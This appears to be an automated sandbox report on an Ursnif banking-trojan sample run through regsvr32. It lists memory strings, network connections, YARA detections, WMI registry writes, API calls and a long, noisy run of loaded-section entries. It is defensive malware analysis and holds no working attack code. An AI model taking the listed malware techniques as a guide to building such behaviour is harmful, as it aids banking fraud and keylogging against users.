Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49753 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.729247214.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729212417.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729069963.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729161495.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1028497045.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729268110.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729280419.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729190744.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729230309.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6940, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.729247214.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729212417.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729069963.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729161495.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1028497045.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729268110.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729280419.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729190744.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729230309.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6940, type: MEMORY

System Summary:

PE file has a writeable .text section

Show sources

Source: f0t0s.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00381812 NtMapViewOfSection,	1_2_00381812
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00381DD0 GetProcAddress,NtCreateSection,memset,	1_2_00381DD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_003822E5 BeginUpdateResourceA,NtQueryVirtualMemory,	1_2_003822E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00BA9932 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_00BA9932
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00BAB2C1 NtQueryVirtualMemory,	1_2_00BAB2C1

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_003820C4	1_2_003820C4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00BAB09C	1_2_00BAB09C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00BAEC48	1_2_00BAEC48
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00BAEC41	1_2_00BAEC41
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00BA99FC	1_2_00BA99FC

Source: f0t0s.dll

Static PE information: invalid certificate

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: @ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ? .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: > .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: = .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: < .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ; .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: : .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 9 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 8 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 7 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 6 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 5 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 4 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 3 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 2 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 1 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 0 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: - .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: , .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: + .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: * .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ) .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ( .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: & .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: % .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: $ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: # .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ! .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ~ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: } .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \| .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: { .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ` .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: _ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ^ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ] .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: [ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
